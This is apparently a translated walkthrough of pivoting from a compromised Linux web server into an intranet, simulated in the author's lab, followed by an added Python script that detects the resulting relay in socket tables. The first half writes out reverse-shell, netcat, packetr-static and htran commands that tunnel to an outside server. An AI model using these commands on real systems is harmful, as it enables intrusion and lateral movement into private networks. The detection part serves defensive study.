Where the original case does not show the details, the operations from the case were simulated on my own machines and recorded here.
Environment:
Compromised Linux host (root already obtained) ----- simulated by a Linux server at 192.168.0.105 on my intranet
My own computer (attacker side) 192.168.1.101
Internet server used for the reverse connection ----- my own Internet server at 61.160.2xx.xxx
Windows test machine 192.168.1.109, used for the intranet penetration test
Tools:
packetr-static on Linux
htran.exe on Windows
SocksCap as the SOCKS client used to reach the intranet
Process:
1. The simulated environment is deliberately restrictive: the compromised Linux server does not expose port 22 to the outside, only the web port 80, so a shell has to be bounced back to a machine on the public Internet. I do not have this environment in my virtual machines, so this step is only described briefly.
Upload back.pl to the /tmp directory on the Linux host and run:
perl /tmp/back.pl xxx.xxx port
On the public Internet server run nc:
nc -l -v -p port (the same port as above)
Now I have two shell windows, one for the proxy and one for data forwarding.
In the proxy window upload packetr-static and execute:
./packetr-static -s 1988
In the data-forwarding window execute:
./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988
2. On the Windows machine on the public network run:
htran.exe -p -listen 123 1988
3. Configure SocksCap.
4. Run the desired program through SocksCap to reach the intranet.
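From the defender's side, the chain above leaves a recognisable footprint on the web server: a process that opens a listener the host is not supposed to have (here the loopback SOCKS port 1988) while the same program also holds an outbound session to an address on the Internet (the relay to the bounce server). The script below is an added example, not code from the original post; it parses `ss -tnp`-style output and correlates the two signs by process name. The sample socket table is constructed, `203.0.113.10` stands in for the external bounce host, the function names are my own, and it assumes port 80 is the only listener the host should have.

```python
import re
from collections import defaultdict

# Constructed sample shaped like `ss -tnp` output (not from the original post): nginx on :80 is the
# only expected listener; the "packetr-static" rows model a loopback SOCKS listener plus a relay
# session to a placeholder external host (203.0.113.10 is not a real address from the case).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
LISTEN 0      511    0.0.0.0:80           0.0.0.0:*           users:(("nginx",pid=812,fd=6))
LISTEN 0      128    127.0.0.1:1988       0.0.0.0:*           users:(("packetr-static",pid=4410,fd=3))
ESTAB  0      0      192.168.0.105:40211  203.0.113.10:123    users:(("packetr-static",pid=4411,fd=4))
ESTAB  0      0      127.0.0.1:40212      127.0.0.1:1988      users:(("packetr-static",pid=4411,fd=5))
ESTAB  0      0      192.168.0.105:80     192.168.0.77:51022  users:(("nginx",pid=812,fd=9))
"""

LINE_RE = re.compile(r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
                     r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)')

def split_addr(addr):
    host, port = addr.rsplit(":", 1)          # also handles '[::]:80' and '0.0.0.0:*'
    return host.strip("[]"), port

def is_internal(host):
    """RFC 1918, loopback and 0.0.0.0/8; non dotted-quad (IPv6, '*') is treated as internal."""
    parts = host.split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        return True
    a, b = int(parts[0]), int(parts[1])
    return a in (0, 10, 127) or (a == 172 and 16 <= b <= 31) or (a == 192 and b == 168)

def parse_ss(text):
    socks = []
    for m in (LINE_RE.match(line) for line in text.splitlines()):
        if not m:
            continue                           # header line or socket without owner info
        lhost, lport = split_addr(m["local"]); phost, pport = split_addr(m["peer"])
        socks.append({"state": m["state"], "proc": m["proc"], "pid": int(m["pid"]),
                      "lhost": lhost, "lport": lport, "phost": phost, "pport": pport})
    return socks

def find_relay_candidates(socks, allowed_listen_ports=frozenset({"80"})):
    """Correlate by process name: unexpected listener + session to an external peer = relay pattern."""
    listeners, external = defaultdict(set), defaultdict(set)
    for s in socks:
        if s["state"] == "LISTEN" and s["lport"] not in allowed_listen_ports:
            listeners[s["proc"]].add(s["lport"])
        elif s["state"] == "ESTAB" and not is_internal(s["phost"]):
            external[s["proc"]].add(f'{s["phost"]}:{s["pport"]}')
    return {"unexpected_listeners": dict(listeners), "external_peers": dict(external),
            "relay_processes": sorted(set(listeners) & set(external))}
```

Run it against real `ss -tnp` output on a host whose listener allow-list you know; a process name appearing in `relay_processes` is worth an immediate look, and the two other keys are useful on their own as weaker signals.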